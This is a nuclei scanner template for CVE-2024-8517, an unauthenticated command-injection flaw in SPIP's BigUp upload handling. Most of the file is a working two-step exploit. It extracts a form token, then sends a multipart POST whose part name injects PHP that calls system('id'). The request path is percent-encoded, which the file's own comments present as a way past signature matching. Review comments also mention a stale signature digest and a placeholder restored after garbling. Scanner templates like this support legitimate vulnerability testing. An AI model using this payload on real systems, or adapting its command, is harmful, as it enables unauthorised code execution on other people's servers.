nuclei-templates/http/cves/2024/CVE-2024-8517.yaml


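id: CVE-2024-8517

# NOTE(review): the trailing "# digest:" line at the end of this file is a
# signature over the template body. After any edit it no longer matches;
# re-sign the template (`nuclei -sign`) or nuclei will treat it as unverified
# (exact handling depends on the nuclei version - check before relying on it).

info:
  name: SPIP BigUp Plugin - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    SPIP before 4.3.2, 4.2.16 and 4.1.18 is vulnerable to OS command injection in the bundled BigUp upload handling.
    A remote, unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart
    file-upload HTTP request. Fixed in SPIP 4.3.2, 4.2.16 and 4.1.18 (see the spip.net advisory below).
  reference:
    - https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html
    - https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/
    - https://vulncheck.com/advisories/spip-upload-rce
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8517
    cwe-id: CWE-646
    epss-score: 0.00045
    epss-percentile: 0.16322
  metadata:
    verified: true
    # Exactly two requests per target: the token fetch and the multipart POST.
    max-request: 2
    shodan-query: http.favicon.hash:-1224668706
    fofa-query: "X-Spip-Cache"
  # "intrusive": the second request actually runs `id` on the target via
  # system(). Only run this against hosts you are authorised to test, and
  # keep the probe command harmless if you adapt the template.
  tags: cve,cve2024,intrusive,spip,rce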
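# Request 2 only runs when request 1 matched (SPIP password-reset form found)
# and its extractor populated {{formulaire}}.
flow: http(1) && http(2)

variables:
  # Random, syntactically valid address for the "oubli" (forgot-password) field.
  email: "{{randstr}}@{{rand_base(5)}}.com"
  # Placeholder content for the uploaded file part.
  string: "{{randstr}}"
  # Random lowercase basename for the uploaded file (".txt" is appended in the request).
  filename: "{{to_lower(rand_text_alpha(5))}}"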
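http:
  # Step 1: load the password-reset form and extract the per-form
  # `formulaire_action_args` value that SPIP expects back in the POST.
  # Both the matcher and the extractor are `internal`, so this step never
  # reports a finding on its own.
  #
  # The path/query use percent-encoded letters (%70 = "p", %65 = "e", i.e.
  # spip.php?page=), presumably to slip past naive signature matching.
  # Detection rules should URL-decode before matching on "spip.php?page=".
  - raw:
      - |
        GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'formulaire_action_args'
          - 'spip'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: formulaire
        regex:
          - name=['"]formulaire_action_args['"]\s*type=['"]hidden['"]\s*value=['"]([^'"]+)['"]
        internal: true

  # Step 2: resubmit the form as a multipart upload. The injected PHP is
  # carried in the form-data part *name* of the file part
  # ("RCE['.system('id').die().']"), not in the file body; per the referenced
  # write-ups that name ends up in code BigUp evaluates. `die()` cuts the
  # response right after the command output so the matcher sees a clean
  # `uid=... gid=...` line.
  #
  # The blank lines between each part's headers and its body are mandatory
  # multipart/form-data syntax (CRLF CRLF); empty parts keep a second blank
  # line so the boundary is preceded by its own CRLF. Do not strip them.
  - raw:
      - |
        POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586

        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="page"

        spip_pass
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="lang"

        fr
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action"

        oubli
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action_args"

        {{formulaire}}
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action_sign"


        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="nobot"


        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="bigup_retrouver_fichiers"

        a
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="RCE['.system('id').die().']"; filename="{{filename}}.txt"
        Content-Type: text/plain

        {{string}}
        --5f02b65945d644d6a32847ab130e9586--

    # NOTE(review): the uploaded filename placeholder above was garbled in the
    # copy this was reviewed from and has been restored from the `filename`
    # variable declared in `variables:` - confirm against upstream.
    matchers-condition: and
    matchers:
      # Proof of execution: output of `id` reflected in the response body.
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200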
# digest: 4a0a00473045022100dd534fd7eb42720fb79916d704dd57561a4fd2b4416d16c3f93cd70c6332ad63022077d670af470a43a31c6958d49d503cd7c56a25a06f1f8111e236360358ba983c:922c64590222798bb761d5b6d8e72950